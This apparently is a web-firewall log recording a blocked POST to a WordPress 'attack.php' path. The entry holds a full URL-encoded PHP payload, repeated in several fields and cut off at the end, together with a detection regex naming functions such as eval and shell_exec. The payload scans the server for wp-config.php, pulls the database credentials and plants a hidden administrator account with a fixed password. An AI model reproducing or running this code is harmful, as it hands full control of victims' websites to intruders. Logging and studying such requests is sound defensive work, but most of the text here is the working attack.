20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:07:27","213.209.159.254","POST","\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> lv:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=36a4c8b62b7aabfcdffca1c8db607abc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvoULvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzkiL2gyMPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nlv=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%